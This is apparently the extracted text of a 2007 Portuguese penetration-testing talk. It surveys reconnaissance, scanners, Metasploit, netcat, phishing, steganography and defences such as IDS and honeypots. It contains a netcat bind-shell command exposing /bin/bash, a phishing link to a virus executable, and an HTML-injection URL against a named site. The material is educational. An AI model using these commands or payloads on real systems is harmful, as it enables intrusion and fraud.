Escolar Documentos
Profissional Documentos
Cultura Documentos
PENTEST Técnicas de Invasão e Defesa
PENTEST Técnicas de Invasão e Defesa
cbrandao@brc.com.br
Cleber Brando
About me
Utilizo linux h 7 anos Aulas de linux Faculdades Radial Formado Gerenciamento de Redes Suporte e aulas Projeto Telecentros SP Participante do ISSA-Brasil Testes de performance e segurana BRconnection
Tpicos
Tcnicas de Invaso
Tcnicas de invaso
Definindo um alvo
Onde buscar informaes? google myspace orkut google groups
Google
Buscas especficas Utilizando recursos avanados do google como as tags Intitle, Inurl, Intext
Engenharia social
Ado e Eva
Ferramentas teis
dig
Uma ferramenta similar ou nslookup porm mais flexvel, pode ser utilizada para fazer buscas como A,TXT, MX e NS.
;; ADDITIONAL SECTION: smtp1.google.com. 2986 smtp2.google.com. 2986 smtp3.google.com. 2986 smtp4.google.com. 2986 ns1.google.com. 345220 ns2.google.com. 345220 ns3.google.com. 345219 ns4.google.com. 345219
PortScan
Nmap
o mais famoso portscan existente hoje. (www.insecure.org/nmap). uma tima ferramenta, muito utilizado por hackers, para descobrir falhas no sistema, em portas abertas desnecessariamente.
Nessus
O Nessus uma ferramenta de auditoria muito usada para detectar e corrigir vulnerabilidades nos PCs da rede local porem muito utilizado por hackers para descobrir a vulnerabilidade de um alvo.
Reports
Nessus Scan Report SUMMARY - Number of hosts which were alive during the test : 1 - Number of security holes found : 1 - Number of security warnings found : 1 - Number of security notes found : 15
Reports
DETAILS . List of open ports : o smtp (25/tcp) (Security notes found) o ssh (22/tcp) (Security notes found) o ftp (21/tcp) (Security notes found)
Reports
Information found on port smtp (25/tcp) An SMTP server is running on this port Here is its banner : 220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov 2007 09:35:31 -0300; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1] . Information found on port smtp (25/tcp) Remote SMTP server banner : 220 note-clebeer ESMTP Sendmail 8.14.1/8.14.1/Debian-8ubuntu1; Thu, 1 Nov 2007 09:35:57 -0300; (No UCE/UBE) logging access from: localhost(OK)-localhost [127.0.0.1]
Reports
. Information found on port ssh (22/tcp) An ssh server is running on this port . Information found on port ssh (22/tcp) Remote SSH version : SSH-2.0-OpenSSH_4.6p1 Debian-5build1 Remote SSH supported authentication : publickey,password Remote SSH banner : CleBeer's |_b note.
Reports
Metasploit
um ambiente utilizado para escrever, testar, e executa cdigos de exploit. Foi desenvolvido para prover penetrao e testes em computadores relacionados a esse assunto, como tambm pesquisa de vulnerabilidade.
Metasploit
Linha de comando
Interface web
http://127.0.0.1:55555/
http://127.0.0.1:55555/
msfconsole
telnet www.alvo.com.br 80
Trying 200.189.171.181... Connected to www.alvo.com.br. Escape character is '^]'. GET / HTTP/1.1 Host: www.alvo.com.br
Resultado
Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Content-Location: http://www.alvo.com.br/index.htm Date: Thu, 01 Nov 2007 13:26:39 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Tue, 19 Sep 2006 00:27:32 GMT
Um programa usado para decifrar senhas suportado nas plataformas UNIX, DOS, WinNT?/Win95. um programa disponvel gratuitamente desenvolvido para decifrar senhas MD5, DES baseado na funo CRYPT.
hping3
Mais uma ferramenta capaz de enviar pacotes TCP, UDP e ICMP personalizados e receber respostas como consegue em icmp. Com ele voc pode enviar arquivos encapsulados e util para ataques DoS.
netcat
Programa para consultoria de redes muito conhecido, isso deve-se ao fato de ele ser um programa muito verstil, podendo desde ser um simples telnet, portscan at um sniffer.
Trojan
nc -l -e /bin/bash -p 1033 A porta 1033 ser colocada em listenning, redirecionaremos a sada de dados para um shell (/bin/bash). Assim quando algum se conectar a essa porta ter domnio total sobre o computador.
Sniffer
# nc -vv -z 75.126.176.71 -p 80 22 110 25 21 servidor9.molservidores.com [75.126.176.71] 22 (ssh) : Connection refused servidor9.molservidores.com [75.126.176.71] 110 (pop3) open servidor9.molservidores.com [75.126.176.71] 25 (smtp) open servidor9.molservidores.com [75.126.176.71] 21 (ftp) open
Phishing
O que phishing? Phishing um tipo de fraude projetada para roubar sua identidade. Em um phishing scam, uma pessoa mal-intencionada tenta obter informaes como nmeros de cartes de crdito, senhas, dados de contas ou outras informaes pessoais convencendo voc a fornec-las sob pretextos enganosos.
Exemplos
Alguns sites famosos que permitem este tipo de fake: google yahoo terra
Yahoo
Buscador terra
Destino???
clebeer.no-ip.org/virus.exe
Outro Exemplo
http://www.cceinformatica.com.br/faleNew.php?mail=cvv@cce.com.br
Adicionando...
&tipo=%3Cimg%20src=http://images.clebeer.multiply.com/logo/2%3E
Esteganografia
Esteganografia basicamente uma tcnica de esconder um arquivo dentro de outro arquivo, podendo ser uma imagem , ou documento do Word at mesmo uma planilha de excel e etc s que de uma forma criptografada.
jp(hide an seek)
origem.jpg
destino.jpg
msg.txt
Ola esta mensagem e secreta e somente pessoas que possuam a senha podem v-la senha: @@(##!(*#$#*(!(@&%$(@)codDEVdw)2231
Utilizao
Esconder mensagem:
Descobir mensagem:
Quanto vale?
Trojan (Shell) - US$ 350,00 - US$700,00 Trojan (Roubo de Senhas) - US$600,00 Listagem E-mail (32 milhes) - US$1.500,00 Milhes de Usurios do ICQ - US$150,00 Proteo Contra Deteco do Trojan - US$20,00 Suporte
Firewall
Port Knock, uma soluo leve e fcil de configurar, permite que portas especficas s sejam abertas no momento desejado atraves de tentativas de conexo em portas especficas.
*IDS
NIDS Network Intrusion Detection System HIDS - Host-based Intrusion Detection System WIDS Wireless Intrusion Detection System KIDS - Kernel Intrusion Detection System
Honeypot
til para vigilncia e alerta aos tipos de ataques mais utilizados porem deve ser utilizado com cuidado para que o invasor no tenha acesso a rede real.
Antispam
Indispensvel para qualquer MX, til para evitar emails forjados e de domnios no confiaveis, pode ser incrementado com opes de RBL e CAPTCHA ("Completely Automated Public Turing test to tell Computers and Humans Apart").
Concluso
Com a popularidade do SL a informao ficou mais acessvel o que colaborou para um maior avano das tcnicas de invaso, em contra partida os sistemas de segurana vem se tornando mais estveis a casa dia.
Crditos
Perguntas
OBRIGADO!